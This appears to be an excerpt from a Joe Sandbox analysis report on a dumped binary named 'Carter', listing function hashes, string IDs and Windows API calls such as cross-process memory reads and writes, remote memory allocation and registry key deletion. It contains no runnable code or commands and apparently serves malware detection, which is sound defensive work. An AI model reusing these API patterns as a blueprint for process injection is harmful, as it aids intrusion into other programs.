                                                                        • Opcode ID: 3c2555f36f42ae1a1169108cc29bb9128de172f38d636ac2a6af890ec7ead55d
                                                                        • Instruction ID: b930885f3af17a38331f84702f398b49358d38b49c7422343e187b3cbc83ea26
                                                                        • Opcode Fuzzy Hash: 3c2555f36f42ae1a1169108cc29bb9128de172f38d636ac2a6af890ec7ead55d
                                                                        • Instruction Fuzzy Hash: 785124B1E4920697FB63A61CCD803AE7BD49B01710F20C9A9F4C5862DDEE7D84D48F46
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #$+
                                                                        • API String ID: 0-2552117581
                                                                        • Opcode ID: 57e9978b51d069e840c2a1217de941a37af800aec3aabc8ef1f3bf01b4ab9e7c
                                                                        • Instruction ID: f283aaf4433d5842e0e87a262a58a88693bba7bce4c05daf59e32ae7c83034c5
                                                                        • Opcode Fuzzy Hash: 57e9978b51d069e840c2a1217de941a37af800aec3aabc8ef1f3bf01b4ab9e7c
                                                                        • Instruction Fuzzy Hash: DE5114B5904255EFEB16DF1CC840AFA7BE8BF99310F140195F9C19B2D0D73A9A42CB60
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$_memmove
                                                                        • String ID: ERCP
                                                                        • API String ID: 2532777613-1384759551
                                                                        • Opcode ID: 17afba1d963f3d9549d18d06e3caff4b4e2bff1a6e31f83616fdf7c70bbd0178
                                                                        • Instruction ID: 6607a5903b73ecdfeceed9255086234142f908984a26164136ca55b76cbcd45d
                                                                        • Opcode Fuzzy Hash: 17afba1d963f3d9549d18d06e3caff4b4e2bff1a6e31f83616fdf7c70bbd0178
                                                                        • Instruction Fuzzy Hash: EE51C471D003099BDB24CF65C8907AABBE9EF48314F14856EE68ADB294E7349581DB90
                                                                        APIs
                                                                          • Part of subcall function 01041CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,01039E4E,?,?,00000034,00000800,?,00000034), ref: 01041CE5
                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0103A3F7
                                                                          • Part of subcall function 01041C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,01039E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 01041CB0
                                                                          • Part of subcall function 01041BDD: GetWindowThreadProcessId.USER32(?,?), ref: 01041C08
                                                                          • Part of subcall function 01041BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,01039E12,00000034,?,?,00001004,00000000,00000000), ref: 01041C18
                                                                          • Part of subcall function 01041BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,01039E12,00000034,?,?,00001004,00000000,00000000), ref: 01041C2E
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0103A464
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0103A4B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                        • String ID: @
                                                                        • API String ID: 4150878124-2766056989
                                                                        • Opcode ID: ff741058f9106baee68c28316fad3a1abcb82bf5339f71b9131dbc1ec4fa1037
                                                                        • Instruction ID: d304a4f1a0324e7b27cb4cdae5242190845fdee3c084dc964e0d21a8169561e3
                                                                        • Opcode Fuzzy Hash: ff741058f9106baee68c28316fad3a1abcb82bf5339f71b9131dbc1ec4fa1037
                                                                        • Instruction Fuzzy Hash: 24415E72A0021DBFDB10DBA4CC85ADEBBB8EF59700F104195FA85B7180DA716E85CBA1
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01067A86
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01067A9A
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 01067ABE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: SysMonthCal32
                                                                        • API String ID: 2326795674-1439706946
                                                                        • Opcode ID: 1a4155089faf45ec12aa1e80657b72e5cf89a4bdb223a97d273ff568d24ed06d
                                                                        • Instruction ID: df4497775a097a7c4f8b9a4549f5a0b8771820bd6d572f1f0ddc824579b539c7
                                                                        • Opcode Fuzzy Hash: 1a4155089faf45ec12aa1e80657b72e5cf89a4bdb223a97d273ff568d24ed06d
                                                                        • Instruction Fuzzy Hash: D221B732610219BFDF258E94CC41FEE3BA9EF88714F150254FE557B1C0D675A950DB90
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0106826F
                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0106827D
                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01068284
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$DestroyWindow
                                                                        • String ID: msctls_updown32
                                                                        • API String ID: 4014797782-2298589950
                                                                        • Opcode ID: ee431bf2ce7135eda4d565205b22b6f7f7db610a4ca77c1acd98503b0983daa8
                                                                        • Instruction ID: 3e6fd9e2d8e23d480dca8b4b9b0e2859cd150cdff015d5c2daf86095cb304d13
                                                                        • Opcode Fuzzy Hash: ee431bf2ce7135eda4d565205b22b6f7f7db610a4ca77c1acd98503b0983daa8
                                                                        • Instruction Fuzzy Hash: 8E21B2B1600209AFEB51DF58CC81DB737EDFB4A354B044149FA419B251CB75EC01CBA0
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01067360
                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01067370
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01067395
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$MoveWindow
                                                                        • String ID: Listbox
                                                                        • API String ID: 3315199576-2633736733
                                                                        • Opcode ID: 77d3965fa4185dde118f5850223b749248470f8ef5c74cbe4f9a27b8f33be09a
                                                                        • Instruction ID: be92ae5ccb0f362f4efdd8588ca94c5f177e63b47a595707982ad50223e56a4b
                                                                        • Opcode Fuzzy Hash: 77d3965fa4185dde118f5850223b749248470f8ef5c74cbe4f9a27b8f33be09a
                                                                        • Instruction Fuzzy Hash: DC21C532600118BFDF528F58CC45EBF37AEEB89754F11C124F9809B190D6719C518BA0
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01067D97
                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01067DAC
                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01067DB9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: msctls_trackbar32
                                                                        • API String ID: 3850602802-1010561917
                                                                        • Opcode ID: 8fd1f8ac9229fee432c55eca7ca59d18a9762cc5dd6957bb99778c4b5e9e41cc
                                                                        • Instruction ID: 1507c0c4b2df1954a69a1648a7a4d32b178406a80f4151bb523a415c594c9848
                                                                        • Opcode Fuzzy Hash: 8fd1f8ac9229fee432c55eca7ca59d18a9762cc5dd6957bb99778c4b5e9e41cc
                                                                        • Instruction Fuzzy Hash: 5F110A72240208BFDF216E65CC45FEB7BADEF89B18F114518FB81A60D0D672D411DB20
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0102027A,?), ref: 0105C6E7
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0105C6F9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                        • API String ID: 2574300362-1816364905
                                                                        • Opcode ID: b41fa3a92fdb40329000057feba41bb9cd44cf268eed978b19bce05162abcc11
                                                                        • Instruction ID: fa36d09426455e5f8989b0ca6bf68fa8a4fa67e45ab8b0e8d5d03459a41e16f2
                                                                        • Opcode Fuzzy Hash: b41fa3a92fdb40329000057feba41bb9cd44cf268eed978b19bce05162abcc11
                                                                        • Instruction Fuzzy Hash: F8E08C78A103028BE7B04A2AD958A4676E8BB05314B40845DE8C5E2608D778E4408F10
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00FF4AF7,?), ref: 00FF4BB8
                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FF4BCA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-1355242751
                                                                        • Opcode ID: ade066bfbd7526844d046fdb961453ab42fc96f5d4b80d3210809d1315161706
                                                                        • Instruction ID: e66491cd55e3f8dbffa0eaa301d5f854e75dde8f3b7e7987d71956685ce94168
                                                                        • Opcode Fuzzy Hash: ade066bfbd7526844d046fdb961453ab42fc96f5d4b80d3210809d1315161706
                                                                        • Instruction Fuzzy Hash: 96D0C771D203128FD7308F32E818B07B2E4AF02360B00CC2EE5C2E6518EA74E880CB00
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00FF4B44,?,00FF49D4,?,?,00FF27AF,?,00000001), ref: 00FF4B85
                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FF4B97
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-3689287502
                                                                        • Opcode ID: 1c1e8ee5acdda458616a3b83bdfbf2a8dc151b04f3c087a628edce03f92f1f1f
                                                                        • Instruction ID: 477f203377bfaf101d08a33b6451c383ee2e27b6544f919b78fbe6f4197188b1
                                                                        • Opcode Fuzzy Hash: 1c1e8ee5acdda458616a3b83bdfbf2a8dc151b04f3c087a628edce03f92f1f1f
                                                                        • Instruction Fuzzy Hash: 31D0E2719207128FD7309E32E828B1676E4AF46261F11896EA9C6E6558E674E880DA24
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00FF5E3D), ref: 00FF55FE
                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FF5610
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                        • API String ID: 2574300362-192647395
                                                                        • Opcode ID: 2398b170bc7f55cf0fa033285b50f74d41de0a735670a02df048c5330f76e4cd
                                                                        • Instruction ID: c7de6ea3b3b775f99aa2e66393c79f9f8d63bba60852a1ed592c249e0ecb56b7
                                                                        • Opcode Fuzzy Hash: 2398b170bc7f55cf0fa033285b50f74d41de0a735670a02df048c5330f76e4cd
                                                                        • Instruction Fuzzy Hash: D2D01774D20B128FEB309F32D808626B6E4AF06B69B11C92EE5D6E6158E674D880CB54
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,01061696), ref: 01061455
                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01061467
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                        • API String ID: 2574300362-4033151799
                                                                        • Opcode ID: 5cbe67f12dae4e9d675f205dbcc175775d201b327b112882123a37f1df81e089
                                                                        • Instruction ID: 7b14411f0a2443156502872287329d40e8171fb4cc514a8d9bd9952e4b647712
                                                                        • Opcode Fuzzy Hash: 5cbe67f12dae4e9d675f205dbcc175775d201b327b112882123a37f1df81e089
                                                                        • Instruction Fuzzy Hash: 73D0C7709113128FEB208F3AD90820276E8AF03281B00C86EE4D6E7144EB74E0C0CB00
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,010593DE,?,01070980), ref: 010597D8
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 010597EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                        • API String ID: 2574300362-199464113
                                                                        • Opcode ID: 250c38365d416bce6e619696215d240d8e0a3c92dd56202c7a5dfda28b22316a
                                                                        • Instruction ID: 47652e0ba440cea3b5d91a705eee111ea8c642eac8e0c90963f99d30c331a723
                                                                        • Opcode Fuzzy Hash: 250c38365d416bce6e619696215d240d8e0a3c92dd56202c7a5dfda28b22316a
                                                                        • Instruction Fuzzy Hash: E6D017B0920717CFE7709F36E898606B6E4FF06395B11C96EE8D6E6108EA74D480CB11
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dba9859cee5fcb8704c3011dee62c3a1d46ff225bdd581339f1651a7ec789743
                                                                        • Instruction ID: 8d6beddd5bbbc251f45d90d7363d4b93877c8f0299d0bd981d578f2f14fb2745
                                                                        • Opcode Fuzzy Hash: dba9859cee5fcb8704c3011dee62c3a1d46ff225bdd581339f1651a7ec789743
                                                                        • Instruction Fuzzy Hash: 66C14A74A00206EFDB54CF98C884AAEFBB9FF88714B108599F945EB251D731ED81CB90
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?), ref: 0105E7A7
                                                                        • CharLowerBuffW.USER32(?,?), ref: 0105E7EA
                                                                          • Part of subcall function 0105DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0105DEAE
                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0105E9EA
                                                                        • _memmove.LIBCMT ref: 0105E9FD
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                        • String ID:
                                                                        • API String ID: 3659485706-0
                                                                        • Opcode ID: f3f0984b6b8de16581df396bd7611767f6e8bca2b9fd09447340a609d474c1fc
                                                                        • Instruction ID: 77f2ad9439789d5af83ed0b292daed73db8854a4e94e02e3ecc7d09bb1e27aa4
                                                                        • Opcode Fuzzy Hash: f3f0984b6b8de16581df396bd7611767f6e8bca2b9fd09447340a609d474c1fc
                                                                        • Instruction Fuzzy Hash: D4C12771A083019FC795DF28C48096ABBE4FF89714F04896DF9D99B351D731EA46CB82
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 010587AD
                                                                        • CoUninitialize.OLE32 ref: 010587B8
                                                                          • Part of subcall function 0106DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,01058A0E,?,00000000), ref: 0106DF71
                                                                        • VariantInit.OLEAUT32(?), ref: 010587C3
                                                                        • VariantClear.OLEAUT32(?), ref: 01058A94
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                        • String ID:
                                                                        • API String ID: 780911581-0
                                                                        • Opcode ID: 1a1796225562ac0bbc674d6440884f1d4de9cf5f683a38fd39c68bd69d0bd49e
                                                                        • Instruction ID: 084356b56678a54d7c5936f09f294125f1b0f1a0d0532bc9b0e8644b1980097a
                                                                        • Opcode Fuzzy Hash: 1a1796225562ac0bbc674d6440884f1d4de9cf5f683a38fd39c68bd69d0bd49e
                                                                        • Instruction Fuzzy Hash: 93A125756047429FDB50DF56C880B2AB7E4BF88364F04894DFA959B3A1CB34ED01CB92
                                                                        APIs
                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01073C4C,?), ref: 01038308
                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01073C4C,?), ref: 01038320
                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,01070988,000000FF,?,00000000,00000800,00000000,?,01073C4C,?), ref: 01038345
                                                                        • _memcmp.LIBCMT ref: 01038366
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
